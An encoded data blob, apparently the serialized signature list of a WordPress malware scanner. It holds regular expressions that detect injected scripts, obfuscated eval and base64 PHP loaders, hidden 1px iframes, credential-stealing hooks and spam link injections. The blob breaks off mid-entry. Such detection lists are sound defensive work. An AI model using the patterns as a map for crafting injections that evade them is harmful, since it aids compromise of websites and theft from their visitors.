x=XSspKyhhZGRfYWN=aW9uXCguKz9cKTtbXHJcbiBcdF=rKStcfS9pIjt9czoyNjoiaGVhZCBzY3JpcHQgZG9jdW1lbnQud3JpdGUiO2E6Mjp7aTowO3M6NToiRDNQRDUiO2k6MTtzOjYyOiIvKD88PVw8XC9oZWFkXD4pXDxzY3JpcHQuKz9kb2N1bWVudFwud3JpdGVcKC4rP1w8XC9zY3JpcHRcPi9zaSI7fXM6MTQ6InNjcmlwdCBodHRwIElQIjthOjI6e2k6MDtzOjU6Ikg1TElVIjtpOjE7czoyNzg6Ii8oPzwhWyciXSk8c2NyaXB=W14-XSooc3JjPVsnIl=_aHR=cFtzXT9cOlwvKChbXC98XC5dWzAtOV=rKXs=fXxcL3d3d1wuYWRzcHRwXC5jb218XC93d3dcLmZyZWVodG1sNXRlbXBsYXRlc1wuY29tKVwvfGNvbGxlY3RcLmpzfFwvd3AtaW5jbHVkZXNcL2pzXC9qY3JvcFwvanF1ZXJ5XC5qc3w-LipodHRwOlwvXC9tYnMtc3VwcG9ydFwuY29tXC9qc1wvanF1ZXJ5XC5taW5cLnBocC4qZG9jdW1lbnRcLndyaXRlXChbIiddPHNjcmlwdC4qXC9zY3JpcHQpW14-XSo-Lio_PFwvc2NyaXB=Pi9pIjt9czoxODoic2NyaXB=IGVuY29kZSBldmFsIjthOjI6e2k6MDtzOjU6IkU5N=dvIjtpOjE7czoxMDU6Ii88c2NyaXB=Lis_KChbMC=5QS1GeF17MjAwfXwoWyciXT8sWyInXT9bMC=5QS1GeF=rKXsyMDB9Lis_ZXZhbCl8KGV2YWwuKz9bMC=5IFx=XCxdezMwMH=pKS4rPzxcL3NjcmlwdD4vaSI7fXM6NTQ6IlRhZ2dlZCBiYXNlNjRfZGVjb2RlIGZpbGVfZ2V=X2NvbnRlbnRzIHBvc2l=aW9uIGlmcmFtZSI7YToyOntpOjA7czo1OiJHNEZJViI7aToxO3M6MzkzOiIvKChcL1wqfFwjKVxzKihbYS16XzAtOV=rXHMqKFwyfFwqXC8pKVxzKi4rP2Jhc2U2NF9kZWNvZGUuKz9ccyouKz9maWxlX2dldF9jb25=ZW5=cy4rP1xzKi4rP3Bvc2l=aW9uLis_XHMqLis_PFwvaWZyYW1lPi4rXHMqKFwvXCp8XCMpW1wvXHNdKlwzfGlmXHMqXChbXlx7XSooKGdvb2dsZXxib3R8eWFob298YmluZ3xIVFRQX1VTRVJfQUdFTlQpW15ce1=rKXs1LH1ceygoXCRbYS16XzAtOV=rW1xzXC5cK1=qPVxzKik_KHNodWZmbGV8YXJyYXkpXChbXjtdKztccyopKmZvcmVhY2hcKFteXHtdK1x7XHMqaWZccypcKHByZWdfbWF=Y2hccypcKFteXHtdK1x7XHMqLis_KFtcQFx-XHNdKihiYXNlNjRfZGVjb2RlfGZpbGVfZ2V=X2NvbnRlbnRzKVxzKlwoKXszfS4rP1xzKihcfVxzKil7M3=pL2kiO31zOjE1OiJzY3JpcHQgYWpheCBQT=MiO2E6Mjp7aTowO3M6NToiRzdHOE8iO2k6MTtzOjE5MDoiLzxzY3JpcHRbXj5dKyhWQlNjcmlwdC4rP=NyZWF=ZU9iamVjdFwoWyciXVNjcmlwdGluZ1wuRmlsZVN5c3RlbU9iamVjdFsnIl1cKS4rP1wuQ3JlYXRlVGV4dEZpbGVcKC4rP1wuV3JpdGUuKz9DcmVhdGVPYmplY3RcKFsnIl1XU2NyaXB=XC5TaGVsbFsnIl1cKS4rP3xhamF4LnBocFsnIl=-WyciXVBPQ1snIl=pPFwvc2NyaXB=Pi9pcyI7fXM6MjY6InRhcmdldHMgYXJyYXkgSkFQbHVnaW5Eb25lIjthOjI6e2k6MDtzOjU6IkQ=OUFKIjtpOjE7czo4MToiLyhcL1wvZmlsZXNbXHQgXHJcbl=rKSpcJHRhcmdldHNbID1cdF=rYXJyYXlcKC4rP2VjaG9bICInXStKQVBsdWdpbkRvbmVbICInO1=rL3NpIjt9czoxNToiaW5jbHVkZSBmYXZpY29uIjthOjI6e2k6MDtzOjU6IkQ=QTdRIjtpOjE7czo=NjoiL1tcclxuXStbXHQgO1=qaW5jbHVkZS4rZmF2aWNvblwuaWNvWyciXCk7XSsvaSI7fXM6MTU6ImFkZF9maWx=ZXIgY3JlZCI7YToyOntpOjA7czo1OiJENEo3VyI7aToxO3M6OTM6Ii9hZGRfZmlsdGVyXCgndGVtcGxhdGVfaW5jbHVkZScsJ2dldF9jcmVkJywxXCk7W1x=IFxyXG5dK2FkZF9maWx=ZXJcKCdzaHV=ZG93bicsJ2NyZWQnLDBcKTsvaSI7fXM6MjE6InByZWdfcmVwbGFjZSBzdHJyZXYgZSI7YToyOntpOjA7czo1OiJENE9GZCI7aToxO3M6ODc6Ii9cJFthLXpBLVowLTlcX1=rW1w9IFx=XStbJyJdZVwvXCpcLlwvWyciXTtbXHJcbiBcdF=rcHJlZ19yZXBsYWNlXChbIFx=XSpzdHJyZXZcKC4qXCk7LyI7fXM6Nzc6ImZ1bmN=aW9uX2V4aXN=cyBnZXQgZmlsZSBmdW5jdGlvbiBjdXJsX2luaXQgZmlsZV9nZXRfY29udGVudHMgZm9wZW4gY3VybF9leGVjIjthOjI6e2k6MDtzOjU6IkcyUEFJIjtpOjE7czozNzQ6Ii88XD9bcGhcc1=rKChpbmlfc2V=fFwkW2Etel8wLTldK1xzKj=pW147XSs7XHMqKSpmdW5jdGlvblxzKyhbYS16XzAtOV=rKVteXHtdK1tcc1x7XSsoXCRbYS16XzAtOV=rXHMqPVteO1=rO1xzKikqKGZvcmVhY2hbXlx7XStbXHNce1=rKFwkW2Etel8wLTldK1xzKihcW1teXF1dK1xdK1xzKikqPVxzKik_Y3VybF9pbml=Lis_cmV=dXJuW147XSo7fChyZXR1cm5ccyspP2N1cmxfW147XSs7XHMqKStbXH1cc1=rKChcJFthLXpfMC=5XStccyo9XHMqKT8oXCRfU=VSVkVSXFt8XDNcKHxmb3BlblwofGZ3cml=ZVwofGZjbG9zZVwoKVteO1=rO1xzKikqKGlmW1xzXChdKyhmaWxlX2V4aXN=c1wofFwkXyhSRVFVRVN8R=V8UE9TKVRcWykuKz9cM1woLispezJ9L2lzIjt9czozMToiZXJyb3JfcmVwb3J=aW5nIGluY2x1ZGUgd3AtYXBwcyI7YToyOntpOjA7czo1OiJHNlBFSyI7aToxO3M6MTY4OiIvKChcJFthLXpfMC=5XStbXHM9XSspPyhlcnJvcl9yZXBvcnRpbmd8aW5pX3NldHxnZXRlbnZ8c3Vic3RyKVwoW15cKV=qXCkrO1xzKikqXEAqKHJlcXVpcmV8aW5jbHVkZSkoX29uY2UpP1tcKCInXHNdK1teO1=rd3AtKGluY2x1ZGVzfGhlYWR8YXBwc3x=ZXh=KVwucGhwWyInXVtcKTtcc1=rL2kiO31zOjM1OiJyZXF1aXJlIGNnaS1sb2NhbCBwaHAgY29tbWVudCBhbG9uZSI7YToyOntpOjA7czo1OiJGN=1CNSI7aToxO3M6MTg3OiIvPFw_W3BoXHNdKyhcL1wqLis_XCpcL1xzKnxcQCkqKHJlcXVpcmV8aW5jbHVkZSkoX29uY2UpKltcKFxzXSsoXCRfU=VSVkVSW1xbXHtdWyInXURPQ1VNRU5UX1JPT1RbJyJdW1xdXH1dW1xzXC5dK1siJ11bXC5cL1=qd3AtW147XSt8WyciXWNnaS1sb2NhbFwvLis_XC5waHBbJyJdW1xzXCldKik7XHMrKFwjLipccyopKlw_Pi9pIjt9czo1Mjoib2Jfc3RhcnQgZ3ppbmZsYXRlIG9iX2dldF9jb25=ZW5=cyBvYl9lbmRfY2xlYW4gZXZhbCI7YToyOntpOjA7czo1OiJHMzZEOCI7aToxO3M6MzIxOiIvPFw_W3BoXHNdKihbaWZcKFxzXCFdKmRlZmluZShkXHMqXChbXlwpXSt8XHMqXChbXixdKyxccyooW2Etel8wLTlcKF=rKSlbXlwpXSpbXCk7XHNce1x9XSspKihcQHxcJFthLXpfMC=5XStbXHNcLl=qPVxzKikqb2Jfc3RhcnRccypcKChbJyJcc1=rKC4qPylbJyJcc1=rXCk7XHMqZnVuY3Rpb25ccytcNlwoLis_ZnVuY3Rpb25ccytcMy4rcmV=dXJuXHMqKFsnIl=pW15cN1=qXDd8Z3ppbmZsYXRlW1woXHNdK29iX2dldF9jb25=ZW5=c1tcKFwpO1xzXStvYl9lbmRfY2xlYW5bXChcKTtcc1=rZXZhbFwoW15cKV=rW1wpXHNdKik7W1xzXH1dKigkfFw_PlxzKikvaXMiO31zOjE3OiJ=YWdnZWQgaWZyYW1lIDFweCI7YToyOntpOjA7czo1OiJENjM2ciI7aToxO3M6MTIyOiIvPFwhLS=gLis_IC=tPltcclxuIFx=XSo8aWZyYW1lIHdpZHRoPSIxcHgiIGhlaWdodD=iMXB4IiBzcmM9Imh=dHA6XC9cL1tePl=rPltcclxuIFx=XSo8XC9pZnJhbWU-W1xyXG4gXHRdKjxcIS=tIC4rPyAtLT4vaSI7fXM6Mjk6InNjcmlwdCBhZnRlciBjbG9zaW5nIGJvZHkgdGFnIjthOjI6e2k6MDtzOjU6Ikc1TTlHIjtpOjE7czo3NjoiLyg_PD1cPFwvKGJvZHl8aGVhZClcPikoXHMqPCgoc2NyaXB=fGEpW1xzPl=uKj88XC8oXDR8Ym9keSl8bWV=YVtePl=qKT4pKy9pcyI7fXM6Mjc6InZhciBSIGZ1bmN=aW9uIHBZTXVTIHdpbmRvdyI7YToyOntpOjA7czo1OiJINkpMTSI7aToxO3M6MjIxOiIvPHNjcmlwdFtePl=qPlxzKih2YXJccyspPyhbYS16XzAtOV=rKVxzKj1ccypcWy4rPygoW2Etel8wLTldKylccyooXFtbXlxdXStbXF1cc1=qKSs9XHMqXDJcW1teXF1dK1tcXVxzXStcKy4rd2luZG93W1xbXHNdK1wyW1xbXHNdK1teXF1dK1tcXVxzXSooPVw=fCxcMlteXF1dK1tcXVxzXCldKylbXH=7XHNdK3xmdW5jdGlvbiBwWU11U1woLis_XClcKHdpbmRvd1wpKTxcL3NjcmlwdD4vaSI7fXM6MzE6IlRhZ2dlZCBlY2hvIHNjcmlwdCBldmFsIEhleEhleF8iO2E6Mjp7aTowO3M6NToiRDZVSXIiO2k6MTtzOjEyMjoiL1wjKFthLXowLTldKylcI1tcclxuIFx=XStlY2hvW1xyXG4nIiBcdF=rPHNjcmlwdCouKz9ldmFsLis_KFthLXowLTldW2EtejAtOV1cXyl7MTAwfS4rPzxcL3NjcmlwdD5bXHJcbiciOyBcdF=rXCNcL1wxXCMvaXMiO31zOjMxOiJ2YXJpYWJsZSBjcmVhdGVfZnVuY3Rpb24gc3RycmV2IjthOjI6e2k6MDtzOjU6IkcySUkxIjtpOjE7czoyNDY6Ii88XD9bcGhcc1=qKFwvXCpbXlwqXSooXCpbXlwqXC9dKikrXC9ccyp8XC9cL1teXG5dKlxzKykqKChcJFthLXpfMC=5XSspXHMqPSk_LitmdW5jdGlvblxzKihbYS16XzAtOV=qKVwoLis_KGV2YWxcKFw1XCh8YmFzZTY=X2RlY29kZVwofFxzKlw=XHMqXChccypzdHJyZXZcKCkuKz8oXClccyopezIsfTtccyooZXZhbFwoLis_KFwpXHMqKXsyLH=7XHMqfFwkW2Etel8wLTldK1xzKj1bXjtdKztccyp8XDFccyopKigkfFw_PlxzKikvaSI7fXM6MjI6Imh=bWwgZW1iZWQgb2JqZWN=IGh=bWwiO2E6Mjp7aTowO3M6NToiRDg3OXYiO2k6MTtzOjU3OiIvPGh=bWw-W1xyXG4gXHRdKjxlbWJlZC4rPzxcL29iamVjdD5bXHJcbiBcdF=qPFwvaHRtbD4vaXMiO31zOjM2OiJyZXF1aXJlIG5ldyBTQVBFX2NsaWVudCByZXR1cm5fbGlua3MiO2E6Mjp7aTowO3M6NToiRzFDTmoiO2k6MTtzOjY3OiIvKFwkW2Etel8wLTldKylccyo9XHMqbmV3XHMqU=FQRV9jbGllbnRcKC4rP1wxLT5yZXR1cm5fbGlua3NcKFwpOy9zIjt9czo5MzoiaWYgZnVuY3Rpb25fZXhpc3RzIF9waHBfY2FjaGVfc3BlZWR1cF9mdW5jX29wdGltaXplcl8gcmVnaXN=ZXJfc2h1dGRvd25fZnVuY3Rpb24gb2JfZW5kX2ZsdXNoIjthOjI6e2k6MDtzOjU6IkY2RzdqIjtpOjE7czoxNTA6Ii9bO1xzXSppZlxzKlwoXCFmdW5jdGlvbl9leGlzdHNcKFsnICJdK19waHBfY2FjaGVfc3BlZWR1cF9mdW5jX29wdGltaXplcl9bJyAiXStcKVwpLis_cmVnaXN=ZXJfc2h1dGRvd25fZnVuY3Rpb25cKFsnICJdK29iX2VuZF9mbHVzaFsnICJdK1wpWztcc1=qXH=vcyI7fXM6NDQ6ImVycm9yX3JlcG9ydGluZyBpbmlfc2V=IGlmIGNvdW5=IFBPU1QgcmV=dXJuIjthOjI6e2k6MDtzOjU6IkQ4TUJuIjtpOjE7czoxMTM6Ii9bXEBdKmVycm9yX3JlcG9ydGluZ1woMFwpOyhbXEAgXHJcbl=qaW5pX3NldFwoKC4rPylcKVs7IFxyXG5dKikraWYgXChjb3VudFwoXCRfUE9TVC4rcmV=dXJuIFwkW2EtejAtOV=rWzsgXH1dKy9pIjt9czozODoiZGl2IFZpYWdyYSBDaWFsaXMgc2NyaXB=IHN=eWxlLmRpc3BsYXkiO2E6Mjp7aTowO3M6NToiRDlIQ2YiO2k6MTtzOjE=MzoiLzxkaXYgaWQ9WyciXShbXj5dKilbJyJdPi4qVmlhZ3JhLitDaWFsaXMuKjxcL2Rpdj5bXHJcbiBcdF=qPHNjcmlwdFtePl=qPi4qZG9jdW1lbnRcLmdldEVsZW1lbnRCeUlkXChbIiddXDFbIiddXClcLnN=eWxlXC5kaXNwbGF5Lio8XC9zY3JpcHQ-L2kiO31zOjcxOiJwaHAgdmFyaWFibGUgYXJyYXkgYmFzZTY=X2RlY29kZSBmdW5jdGlvbl9leGlzdHMgbnVtZXJpYy1uYW1lZCBmdW5jdGlvbiI7YToyOntpOjA7czo1OiJHNktLbyI7aToxO3M6Mzc1OiIvPFw_W3BoXHNdKyhcL1wqKFteXCpdKlwqW15cL1=pKlteXCpdKlwqXC9ccyp8XC9cL1teXG5dKlxzKykqXCRbYS16XzAtOSciXFtcXVxzXSs9XHMqYXJyYXlcKC4qP2Jhc2U2NF9kZWNvZGVcKC4rP1wpKztccyooaWZccypcKFwhZnVuY3Rpb25fZXhpc3RzXChbIiddX1swLTldK1siJ11bXClcc1=rXHtccyp8XD8-XHMqPFw_W3BoXHNdKykqZnVuY3Rpb24gX1swLTldK1woKC4rPylbXH1cc1=rKFw_PlxzKjxcP1twaFxzXStcQD9cJEdMT=JBTFNccyooXFtbXlxdXSpcXStccyp8XHtbXlx9XSpcfStccyopK1woLisoZXZhbHxcJEdMT=JBTFMoXHMqXFtbXlxdXSpcXStccyp8XHtbXlx9XSpcfSspKylccypcKFteXCldK1tcKTtcfVxzXSspKihcMXwkfFw_PikrL2kiO31zOjMyOiJUYWdnZWQgaWYgZW1wdHkgc2NyaXB=IGV2YWwgZWNobyI7YToyOntpOjA7czo1OiJFMUc4OCI7aToxO3M6MTc3OiIvXCMoW2EtejAtOV=rKVwjW1xyXG4gXHRdK2lmWyBcdF=qXChlbXB=eVwoKFwkW2Etel8wLTldKylcKVwpW1xyXG5ceyBcdF=rXDJbXHJcbiciID1cdF=rPHNjcmlwdC4rPyhldmFsfHNyYz1bXFwnIl=raHR=cCkuKz88XC9zY3JpcHQ-W1xyXG4nIjsgXHRdK2VjaG8gXDJbXHJcbjsgXH1cdF=rXCNcL1wxXCMvaXMiO31zOjQ=OiJ2YXIgSFRUUF9VU=VSX=FHRU5UIGlmIG1hdGNoIHN=cmluZyB2YXIgZWxzZSI7YToyOntpOjA7czo1OiJEQUpIMiI7aToxO3M6MTI2OiIvKFwkW2EtelxfMC=5XSspW1x=ID1dK1wkX1NFUlZFUlxbWyInXUhUVFBfVVNFUl9BR=VOVFsnIl1cXTsuKz9pZiBcKFwkW2EtelxfMC=5XStcKFteLF=rLCBcMVwpXCkgXHtbXlx9XStcfSBlbHNlIFx7W15cfV=rXH=vaXMiO31zOjM=OiJkaXYgcGhwIGVycm9yX3JlcG9ydGluZyBmb3BlbiBodHRwIjthOjI6e2k6MDtzOjU6Ikc4UTdYIjtpOjE7czo4NDoiLzxkaXYgW14-XSo-XHMqPFw_W3BoXHNdK2Vycm9yX3JlcG9ydGluZ1woLis_Zm9wZW5cKFsiJ11odHRwOlwvXC8uKz9cPz5ccyo8XC9kaXY-L2lzIjt9czo2OToiRE9DVU1FTlRfUk9PVCBpZiBmaWxlX2V4aXN=cyBmaWxlX2dldF9jb25=ZW5=cyBnemluZmxhdGUgcHJlZ19yZXBsYWNlIjthOjI6e2k6MDtzOjU6IkdDVkc2IjtpOjE7czozNjI6Ii9cJChbYS16XzAtOV=rKVxzKj1bXjtdKlwkX1NFUlZFUltcc1xbXHtdKyhbIiddKShET=NVTUVOVF9ST=9UfFNDUklQVF9OQU1FKVwyW1xzXF1cfV=rLis_aWZccypcKFxzKmZpbGVfZXhpc3RzXHMqXCguKz9cJChbYS16XzAtOV=rKVxzKj1bXHNcQF=qKGZpbGVfZ2V=X2NvbnRlbnRzXHMqXChccypcJFwxLis_XCQoW2Etel8wLTldKylccyo9W1xzXEBdKmd6aW5mbGF=ZVxzKlwoXHMqXCRcNC4rP3ByZWdfcmVwbGFjZS4rP1wpO1tcfVxzXSt8c2NhbmRpclxzKlwoW147XSs7XHMqZm9yZWFjaFxzKlwoXCRcNC4rZndyaXRlXHMqXChbXjtdKztccypmY2xvc2VccypcKFteO1=rO1tcfVxzXSt1bmxpbmtccypcKFxzKlwkXDFcKTtccyopL2lzIjt9czo1NDoiZnVuY3Rpb24gZm91cm9mb3VyIGFkZF9maWx=ZXIgYWxsX3BsdWdpbnMgZm91cm9mb3VyX3BwIjthOjI6e2k6MDtzOjU6IkRCSE1tIjtpOjE7czo4MToiL2Z1bmN=aW9uIGZvdXJvZm91clwoXCkuK2FkZF9maWx=ZXJcKFsiJ11hbGxfcGx1Z2luc1ssICInXStmb3Vyb2ZvdXJfcHBbIiddXCk7L2lzIjt9czoxNDoicCBwYXlkYXkgbG9hbnMiO2E6Mjp7aTowO3M6NToiRzVCQ=siO2k6MTtzOjQ2OiIvPHBbXj5dKj5ccyouKz9wYXlkYXkgbG9hbi4rP1tcclxuXStccyo8XC9wPi9pIjt9czoyNjoic2NyaXB=IHNyYyBlYXJubW9uZXlkby5jb2=iO2E6Mjp7aTowO3M6NToiRzZIRnMiO2k6MTtzOjE2NToiLyg8KHNjcmlwdHxhKVtePl=rKGhyZWY9WyciXVtmaHRwc2w6XSpcL1wvKHNlY3VyZVwucGF5emEpW14-XSs-XHMqPGltZ1tePl=rKT9zcmM9WyciXVtmaHRwc2w6XSpcL1wvKFw=fG9ubGluZS1zYWxlMjR8ZWFybm1vbmV5ZG98Z2NjYW5hZGF8ZzAwKVwuY28uKz9ccyo8XC9cMj5ccyopKy9pIjt9czo5MjoicGhwIHZhciBhcnJheSB2YXIgdGV4dCBpZiBmdW5jdGlvbl9leGlzdHMgZnVuY3Rpb24gZm9yZWFjaCBjaHIgcmV=dXJuIHZhcmlhYmxlIGZ1bmN=aW9uIHRleHQiO2E6Mjp7aTowO3M6NToiRzRSS3MiO2k6MTtzOjMwMzoiLzxcP1twaFxzXSsoXCRbYS16XzAtOV=rKFxzKlxbW15cXV=rXF=rKSpbXHNcLlwrXC1dKj1ccyooKGFycmF5XCh8XCRceyk_KChbJyJdKS4qP1w2fFwkW2Etel8wLTldKyhccypcW1teXF1dK1xdKykqKVtcLlwsXHNcKVx9XSopKztccyopKygoaWZccypcKFteXHtdK1x7XHMqKT9mdW5jdGlvblteXHtdK1x7LipyZXR1cm5bXjtdKjtbXHNcfV=rKSsoaWZccypcKFteXHtdK1x7XHMqKT8oZWNob3xwcmludHxkaWUpW1xzXChce1=rXCRbYS16XzAtOV=rKFxzKlxbW15cXV=rXF=rKSpccypcKFteO1=qO1tcc1x9XSsoJHxcPz5ccyopL2lzIjt9czozNjoiVGFnZ2VkIGVycm9yX3JlcG9ydGluZyBiYXNlNjRfZGVjb2RlIjthOjI6e2k6MDtzOjU6IkZBOUNiIjtpOjE7czoxODM6Ii8oXC9cKi4rP1wqXC98PFwhLS=uKz8tLT4pXHMqKGlmW1woIFwhXStkZWZpbmVkXChbXlwpXStbXCkgXHtdKy4qP2RlZmluZVwoLis_XCkrO1tcc1x9XSopKigoXEB8XCRbYS16XF8wLTldK1xzKltcLj1dKykqKGVycm9yX3JlcG9ydGluZ3xpbmlfc2V=fG9iX3N=YXJ=KVwoLis_KStiYXNlNjRfZGVjb2RlXCguKz9cMS9pcyI7fXM6NDM6IlRhZ2dlZCBjcmVhdGVFbGVtZW5=IHNjcmlwdCBzcmMgYXBwZW5kQ2hpbGQiO2E6Mjp7aTowO3M6NToiRTJHQnUiO2k6MTtzOjE1MjoiL1wvXCogWzAtOWEtel=rIFwqXC9bXHJcbiBcdF=qLisoW2EtejAtOV=rKVtcdCA9XWRvY3VtZW5=XC5jcmVhdGVFbGVtZW5=XChbJyJdUy4rP1wxXC5zcmNbXHQ9IF=rLis_XC5hcHBlbmRDaGlsZFwoXDFcKS4rP1tcclxuIFx=XSpcL1wqIFswLTlhLXpdKyBcKlwvL2kiO31zOjM3OiJQSFAgVmFycyBDb25jYXQgVmFyaWFibGUgRnVuY3Rpb24gRU5EIjthOjI6e2k6MDtzOjU6IkgzTkpTIjtpOjE7czozNzM6Ii88XD9bcGhcc1=rKChcL1wqKFteKl=qXCooPyFcLykpKlteKl=qXCpcL1xzKikqfFxAP2Vycm9yX3JlcG9ydGluZ1tcKDBcKVxzXSs7XHMqKSooXCRbYS16XzAtOV=rKFxzKlxbW15cXV=rXF=rKSpbXHNcLl=qPVteO1=rO1xzKikrKFwkW2Etel8wLTldKyhccypcW1teXF1dK1xdKykqXHMqPVxzKik_XEA_KFwkW2Etel8wLTldKyhccypcW1teXF1dK1xdKykqfHN=cl9yZXBsYWNlfGNyZWF=ZV9mdW5jdGlvbilccypcKC4qPygoXCRbYS16XzAtOV=rKFxzKlxbW15cXV=rXF=rKSpccyo9KT9bXEBcc1=qXCRbYS16XzAtOV=rKFxzKlxbW15cXV=rXF=rKSpccypcKFteO1=qO1xzKikrKFwvXCooW14qXSpcKig_IVwvKSkqW14qXSpcKlwvXHMqKSooXD8-fCQpL2kiO31zOjY1OiJkaXYgc2NyaXB=IGRvY3VtZW5=IGdldEVsZW1lbnRCeUlkIHZpc2liaWxpdHkgaGlkZGVuIGRpc3BsYXkgbm9uZSI7YToyOntpOjA7czo1OiJGNUo3YyI7aToxO3M6MjQ4OiIvPGRpdiBpZD1bJyJdKFthLXpcXzAtOV=rKVsnIl=uKz88XC9kaXY-XHMqPHNjcmlwdFtePl=qPlxzKigoZnVuY3Rpb25ccyg_IWhpZGVtZXNzYWdlKShbYS16XF8wLTldKyl8aWYpW1xzXChdK1teXCldKltcKVxzXHtdKik_KGRvY3VtZW5=XC5nZXRFbGVtZW5=QnlJZFwoWyInXVwxWyInXVwpXC5zdHlsZVwuKHZpc2liaWxpdHl8ZGlzcGxheSlccyo9XHMqWyInXShoaWRkZW58bm9uZSlbIiddO1xzKikrW1xzXH1dKjxcL3NjcmlwdD4vaSI7fXM6NDc6ImFkZF9hY3Rpb24gd3BfZm9vdGVyIHNlcnZlIGV4YW1wbGVfYWRtaW5fbm9=aWNlIjthOjI6e2k6MDtzOjU6IkdCM=NMIjtpOjE7czoxNjM6Ii8oYWRkX2FjdGlvblwoXHMqWyciXSh3cF9mb29=ZXJ8aW5pdHxhZG1pbl9ub3RpY2VzKVsnIl1bLFxzXSsoXEA_Y3JlYXRlX2Z1bmN=aW9uW1xzXChdKyk_WyciXSguKz9iYXNlNjRfZGVjb2RlLis_fGV4YW1wbGVfYWRtaW5fbm9=aWNlfHNlcnZlKVsnIl1bXHNcKV=rO1xzKil7Mix9L2kiO31zOjUxOiJQSFAgZXJyb3JfcmVwb3J=aW5nIGlmICFpc3NldCB2YXJpYWJsZSBmdW5jdGlvbiBFTkQiO2E6Mjp7aTowO3M6NToiSDdDRGsiO2k6MTtzOjIyNjoiLygoZXJyb3JfcmVwb3J=aW5nXHMqXCh8XCRbYS16XzAtOV=rXHMqPSlbXjtdKztccyopKmlmXHMqXCguKz9cKStccypce1xzKigoXCRbYS16XzAtOV=rKVxzKj1bXjtdKztccyopKigoXCRbYS16XzAtOV=rKVxzKj1bXjtdKztccyopKigoXCRbYS16XzAtOV=rKVxzKj=rXHMqKT8oXDR8XDYpXHMqXCguKz8oXCRbYS16XzAtOV=rXHMqPVxzKik_XDhccypcKFteXCldKlwpK1tccyciXCk7XSpcfS9pcyI7fXM6NjY6InNjcmlwdCBpZiBuYXZpZ2F=b3IgdXNlckFnZW5=IG1hdGNoIGRvY3VtZW5=IHdyaXRlIHNjcmlwdCBzcmMgaHR=cCI7YToyOntpOjA7czo1OiJFM1FDZCI7aToxO3M6MTQ=OiIvPHNjcmlwdD5bXHRcclxuIF=qaWZbXHQgXChdK25hdmlnYXRvclwudXNlckFnZW5=XC5tYXRjaFwoLis_XHtbXHRcclxuIF=qZG9jdW1lbnRcLndyaXRlXChbIiddPHNjci4rPyBzcmM9WyciXWh=dHAuKz9cKVs7XH=gXHRcclxyXSs8XC9zY3JpcHQ-L2kiO31zOjYxOiJwaHAgZnVuY3Rpb24gQXJyYXkgcmV=dXJuIGJhc2U2NF9kZWNvZGUgcGhwIFZhcmlhYmxlIGZ1bmN=aW9uIjthOjI6e2k6MDtzOjU6IkczSUFhIjtpOjE7czoyMzk6Ii8oZnVuY3Rpb25ccysoW2Etel8wLTldKylccypcKFxzKihcJFthLXpfMC=5XSspW1wpXHNce1=rXDNbPVxzXStnemluZmxhdGVcKGJhc2U2NF9kZWNvZGVcKC4rW1wpO1xzXSspP2ZvclxzKlwoW15ce1=rXHtccyooXCRbYS16XzAtOV=rKShccypcW1teXF1dK1xdKykqW1wuXHNdKj1bXEBcc1=qY2hyXChbXjtdK1s7XHNcfV=rKHJldHVyblteO1=qWztcfVxzXSspP2V2YWxcKChcMlwofFw=KVteXCldKltcKVxzXSs7Ki9pIjt9czoyNToiaW5jbHVkZV9vbmNlIHJzcy1pbmZvLnBocCI7YToyOntpOjA7czo1OiJIOU1LayI7aToxO3M6MjM3OiIvKChcJFthLXpfMC=5XSspXHMqPS4rP1wuKGpzfHBuZ3xnaWYpWyciXTtccyopKigoaWZbXHNcKF=rfGlzX3xmaWxlfF9leGlzdHMpezMsfVtcKFxzXSsoXDJ8ZGlybmFtZVwoX19GSUxFW19cKVwuJyJcL1xzXSt3cC12Y2RcLnBocFsnIl=pW1wpXHNdKyk_XEA_aW5jbHVkZV9vbmNlXChccyooXDIuKj98KGRpcm5hbWVcKF9fRklMRVtfXClcLiciXC9cc1=rd3AtdmNkfFsnIl1yc3MtaW5mbylcLnBocFsnIl=pXCk7L2kiO31zOjIxOiJpc19ib3QgX192aWFfY29udGVudCkiO2E6Mjp7aTowO3M6NToiRzlNQlYiO2k6MTtzOjI4NzoiLyh2YXJccysoW2Etel8wLTldKylccyo9W147XSs7XHMqKSooZnVuY3Rpb25ccysoW15cKF=qY29va2llW15cKF=qfFthLXowLTldezQxfSlcKFteXHtdKlx7Lio_KChkb2N1bWVudC5jb29raWVbXjtdKyg7XHMqWyciXSk_fHJldHVybnxpZlxzKlwoZG9jdW1lbnRcLnJlZmVycmVyW15ce1=rXHtccypcMlxzKj=pW147XSo7XHMqKFx9XHMqKSspKyl7NSx9KFwoKmZ1bmN=aW9uXHMqKFtcKFwpXSt8W2EtejAtOV17NDF9XChbXlx7XSopXHMqXHsuKj9cKTtccypcfVtcKVxzXSpcMTBccyo7XHMqKXsyLH=vaXMiO31zOjQxOiJzZXQgdmFyIHN=cl9yZXBsYWNlIHZhciB2YXJpYWJsZSBmdW5jdGlvbiI7YToyOntpOjA7czo1OiJGN=1DNyI7aToxO3M6MzE3OiIvKChcJFthLXpcXzAtOV=rKFxzKlxbW15cXV=rXF=pKilccyo9XHMqXEA_XCRbYS16XF8wLTldKyhccypcW1teXF1dK1xdKykqXHMqXChcQD9cJF8oUkVRVUVTVHxHRVR8UE9TVHxDT=9LSUUpKFxzKlxbW15cXV=rXF=rKSpcKTtccyopKyhcJFthLXpcXzAtOV=rfHByZWdfcmVwbGFjZSlccypcKFxzKihbJyJdKShbXCFcL1wjXHxcQFwlXF5cKlx-XSkuKz9cOVtpbXN4XSplW2ltc3hdKlw4XHMqLFxzKlwyXHMqLCgoW1wkYS16XF8wLTldKyhccypcW1teXF1dK1xdKSp8J1teJ1=qJ3wiW14iXSoiKVtcLlxzXSopK1wpKztccyooZGllXChbXlwpXSpcKSs7KT8vaSI7fXM6NjQ6IlRhZ2dlZCBlcnJvcl9yZXBvcnRpbmcgY3VybF9pbml=IGZpbGVfZ2V=X2NvbnRlbnRzIGZ3cml=ZSBzY3JpcHQiO2E6Mjp7aTowO3M6NToiRzVIRTUiO2k6MTtzOjQ4MToiLzxcP1twaFxzXSsoW1xAXC9cI1xzXSooZXJyb3JfcmVwb3J=aW5nfGluaV9zZXR8c2V=X3RpbWVfbGltaXR8aGVhZGVyKVxzKlwoW15cKV=qW1wpO1xzXSspKigoWztcc1=qKFwkW2Etel8wLTldK1xzKj1bXjtdKztccyp8ZWxzZVtcc1x7XSopKmlmXHMqXChbXjtdKykrKChmaWxlX2dldF9jb25=ZW5=c1xzKlwofG1rZGlyXHMqXCh8Y3VybF9bYS16XStccypcKHxkaWVccypcKHwoZWNob3xwcmludClbXjtdKztccyoocmV=dXJufGV4aXQpKVteXH1dK1x9XHMqKSspKyhlbHNlW1xzXHtd